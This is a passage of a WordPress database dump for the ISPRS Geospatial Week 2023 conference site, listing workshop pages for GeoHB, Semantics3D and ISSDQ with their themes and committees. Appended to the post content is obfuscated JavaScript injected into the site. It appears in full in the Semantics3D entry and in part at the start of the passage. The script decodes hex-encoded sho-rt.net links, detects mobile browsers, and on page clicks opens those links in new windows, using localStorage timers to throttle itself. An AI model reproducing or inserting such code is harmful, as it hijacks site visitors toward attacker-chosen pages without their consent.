Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','publish','closed','closed','','geohb-2023-geo-spatial-computing-for-understanding-human-behaviours','','','2023-02-05 14:10:34','2023-02-05 14:10:34','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2791',0,'dt_portfolio','',0),
(2792,1,'2022-10-14 15:38:46','2022-10-14 15:38:46','','m1','','inherit','open','closed','','m1','','','2022-10-14 15:38:46','2022-10-14 15:38:46','',2791,'https://gsw2023.com/wp-content/uploads/2022/10/m1.jpg',0,'attachment','image/jpeg',0),
(2793,1,'2022-10-14 15:38:54','2022-10-14 15:38:54','','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2022-10-14 15:38:54','2022-10-14 15:38:54','',2791,'https://gsw2023.com/?p=2793',0,'revision','',0),
(2795,1,'2022-10-14 15:59:50','2022-10-14 15:59:50','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2841\" img_size=\"800x800\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Semantics3D - Semantic Scene Analysis and 3D Reconstruction from Images and Image Sequences</span></strong></h5>\r\n<h5></h5>\r\n<p>&nbsp;</p>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Automated 3D reconstruction and the extraction of semantic information from images and image sequences are important research topics in Photogrammetry, Remote Sensing, GIS, and Computer Vision. This workshop is a follow-up to the first event under the same name embedded in the ISPRS Geospatial Week 2019 in Enschede. It will bring together experts working in photogrammetric 3D reconstruction, semantic interpretation of imagery and image sequence analysis to discuss recent developments, the potential of various data sources, and future trends in 3D reconstruction and information extraction from imagery. Its focus is on methodological research. Semantic3D will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related geospatial workshops. The event will be held as a two-day single track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week.</strong></h5>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"50\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2843\" img_size=\"1600x600\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\r\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>Feature extraction, stereo/multi-view sparse matching, dense image matching</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>3D data acquisition and surface reconstruction</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Automatic detection and 3D reconstruction of objects using data from terrestrial, airborne or satellite sensors</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Deep learning and other supervised methods for 3D reconstruction and for the semantic interpretation of 3D scenes based on images, point clouds, or surface meshes</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Multi-source, multi-view, multi-temporal, multi-modal image analysis: Integration of data from multiple viewpoints or multiple sensors for automated object detection and 3D reconstruction</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Integration of existing interpreted data such as historical maps or urban GIS for object detection and reconstruction</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Uncertainty estimation and uncertainty propagation in 3D reconstruction and classification</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Methods for the generation and update of high-resolution 3D city models and road databases</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Object detection, recognition, 3D reconstruction and tracking in the context of robotics or autonomous driving and mobile mapping</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Dynamic scene understanding</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Change detection in image time series and 3D point clouds</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Integration of images, motion and vehicle models</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Video analysis for security/surveillance tasks</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Explainable machine learning for geospatial applications</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Methods to overcome data biases, limited labels, and weak labels</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Evaluation of performance, speed, reliability, robustness, and generalization ability of methods</strong></h6>\r\n</li>\r\n</ul>\r\n<h6></h6>\r\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>Ksenia Bittner, German Aerospace Center(DLR), Germany</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Jan Böhm, University College London, UK</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Max Coenen, Leibniz Universität Hannover, Germany</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Pablo d\'Angelo, German Aerospace Center (DLR), Germany</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Friedrich Fraundorfer, Graz University of Technology, Austria</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Markus Gerke, Technische Universität Braunschweig, Germany</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Norbert Haala, University of Stuttgart, Germany</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Dorota Iwanszczuk, TU Darmstadt, Germany</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Jinha Jung, Purdue University, USA</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Arpan Kusari, University of Michigan, USA</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Florent Lafarge, INRIA, Sophia Antipolis, France</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Loic Landrieu, National Geographical Institute, France</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Max Mehltretter, Leibniz Universität Hannover, Germany</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Sander Oude Elberink, University of Twente, The Netherlands</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Charlotte Pelletier, University of Southern Brittany, France</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Ribana Roscher, University of Bonn, Germany</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Franz Rottensteiner, Leibniz Universität Hannover, Germany</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Marc Russwurm, Federal Institute of Technology (EPFL), Lausanne, Switzerland</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Maria Vakalopoulou, University of Paris-Saclay, France</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Bruno Vallet, Institut Géographique National (IGN), France</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Jan Dirk Wegner, University of Zurich, Switzerland</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Martin Weinmann, Karlsruhe Institute of Technology, Germany</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Wen Xiao, China University of Geosciences, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Bisheng Yang, Wuhan University, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Michael Ying Yang, University of Twente, The Netherlands</strong></h6>\r\n</li>\r\n</ul>\r\n<h6><strong>Others tba.</strong></h6>\r\n<h6></h6>\r\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>WG II/2 Point cloud acquisition and processing </strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>WG II/3 3D scene reconstruction for modeling &amp; mapping</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>WG II/4 AI / ML for geospatial data</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>WG II/5 Temporal geospatial data understanding</strong></h6>\r\n</li>\r\n</ul>\r\n<h6><strong><u> </u></strong></h6>\r\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Special Issue dedicated to the workshop: </u></strong></h5>\r\n<h6><strong>After the workshop, authors of selected papers will be invited to submit extended versions of their papers to the journal PFG – Journal of Photogrammetry, Remote Sensing and Geoinformation Science (<a style=\"text-align:justify; color:blue;\" href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a>; current impact factor: 3.292). The papers being accepted after the peer-review process of the journal will appear in a special issue of that journal dedicated to this workshop. </strong></h6>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Semantics3D - Semantic Scene Analysis and 3D Reconstruction from Images and Image Sequences','','publish','closed','closed','','semantics3d-semantic-scene-analysis-and-3d-reconstruction-from-images-and-image-sequences','','','2023-02-05 14:12:22','2023-02-05 14:12:22','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2795',0,'dt_portfolio','',0),
(2796,1,'2022-10-14 15:59:30','2022-10-14 15:59:30','','m1','','inherit','open','closed','','m1-2','','','2022-10-14 15:59:30','2022-10-14 15:59:30','',2795,'https://gsw2023.com/wp-content/uploads/2022/10/m1-1.jpg',0,'attachment','image/jpeg',0),
(2797,1,'2022-10-14 15:59:50','2022-10-14 15:59:50','','Semantics3D - Semantic Scene Analysis and 3D Reconstruction from Images and Image Sequences','','inherit','closed','closed','','2795-revision-v1','','','2022-10-14 15:59:50','2022-10-14 15:59:50','',2795,'https://gsw2023.com/?p=2797',0,'revision','',0),
(2798,1,'2022-10-14 16:08:33','2022-10-14 16:08:33','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2802\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">ISSDQ 2023- Artificial Intelligence and Uncertainty Modeling in Spatial Analysis</span></strong></h5>\r\n<h5></h5>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Spatial data quality concerns with the reliability, confidence and trustworthiness of spatial data and their fitness for use. In the new era of spatial big data, IoT, smart city, ubiquitous spatial information systems and volunteered data produced using space-borne, areal and geo-sensors as well as human sensors in the phases of collection, fusion and leveraging artificial intelligence for spatial information extraction, and modeling, the issue of spatial data quality and uncertainty assessment requires more attention than ever before. Spatial data quality and uncertainty assessment/modeling are integrated components of spatial information systems main functionalities in measuring, mapping, managing, modeling and monitoring. The 12<sup>th</sup> International Symposium on Spatial Data Quality (ISSDQ 2023) will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related geospatial workshops. The event will be held as a two-day single-track symposium of keynote and oral presentations as well as poster sessions and a panel discussion in the context of the ISPRS Geospatial Week.</strong></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_row_inner][vc_column_inner][vc_column_text]\r\n<h1><strong>CHAIRES</strong></h1>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"51\"][/vc_column_inner][/vc_row_inner][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: red;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Spatial data quality in space and time,</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Leveraging artificial intelligence in spatial data analysis and quality assessment,</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Collaborative spatial data quality</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Uncertainty modeling, assessment and propagation in spatial analyses</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Error assessment and propagation in digital terrain modeling</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Intelligent methodologies to integrate and assess spatial data and spatial analysis</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Smart spatial data infrastructures, land administration systems, cadastral surveying and mapping, BIM and their quality assessment</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Interoperability issues in spatial data analysis</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Challenges in assessing big spatial data in spatial information science</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6>Spatial and spatio-temporal statistics methods and th<strong>eir uncertainty assessment</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Challenges in assessment of UBGI/UBGIS, GSN, autonomous driving, smart city, multidimensional GIS, UAV, marine GIS, disaster management, and real time spatial data collections, collation and processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Harmonization of spatial information models and standards</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Matching the spatial data quality of combining multiple datasets</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Increasing spatial data quality through fusion</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Deep learning spatial data quality assessment</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Spatial data quality assessment of transferability</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Spatial data quality visualization</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Web GIS data quality</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Sensor-based data quality</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Intelligent GIS</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2803\" img_size=\"1200x800\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: justify; color: red;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Bryan C. Pijanowski, University of Purdue, US.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Christophe Claramunt, Naval Academy Research Institute, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Giles Foody, Nottingham University, UK</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Qiming Zhou, Baptist University, Hong Kong</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mir Abolfazl Mostafavi, Laval University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Nico vande Weghe, Ghent University, Belgium</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Alfred Stein, Twente University, The Netherlands</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>John W.Z. Shi, The Hong Kong Polytechnic University, </strong></h6>\r\n<h6><strong>Hong Kong, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Gerhard Navratil, TU Wien, Austria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Jamal Jokar Arsanjani, Aalborg University, Denmark</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Ana-Maria Raimond, IGN, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Jan Blachowski, Warsaw University, Poland</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Yongze Song, Curtin University, Australia</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mojgan Jadidi, York University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Hossein Chavoshi, University of Life Science, Norway</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Robert G. Pontious, Clark University, US</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Alexis Comber, Leeds University, 